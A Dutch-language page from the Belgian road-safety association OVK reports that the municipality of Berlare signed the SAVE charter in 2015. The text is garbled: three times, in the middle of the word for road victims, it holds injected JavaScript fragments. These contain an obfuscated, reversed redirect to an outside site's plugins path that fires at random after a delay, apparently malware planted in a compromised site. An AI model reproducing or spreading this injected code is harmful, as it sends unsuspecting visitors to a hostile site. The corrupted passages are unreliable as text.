Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Berlare ondertekent SAVE-charter

Op 27 februari 2015 ondertekende Berlare als 43e gemeente het SAVE-charter Steden & Gemeenten.

De gemeente Berlare hecht veel belang aan verkeersveiligheid. Jammer genoeg kende de gemeente al enkele verkeerslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers. In 2014 werd daarom het monument ‘The Mooring’ in het kasteelpark geplaatst om de herinnering aan alle Berlaarse verkeersslachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffers levende te houden. Het monument is er voor iedereen die ooit slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer was in het verkeer, maar ook voor alle nabestaanden.

Met acties als ‘het klikt tussen ons’ en ‘zet er je TandeMmm in’ probeerde de gemeente Berlare in het verleden, samen met de lokale politie, verenigingen en partners, het bewustzijn rond verkeersveiligheid te verhogen. Door het ondertekenen van het SAVE-charter wenst de gemeente Berlare een duidelijk signaal te geven dat ze zal blijven investeren in acties die gericht zijn op de verbetering van de verkeersveiligheid.

Tv Oost nam verslag van het ondertekeningsmoment. De video is te bekijken via deze link: videofragment ondertekening Berlare


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be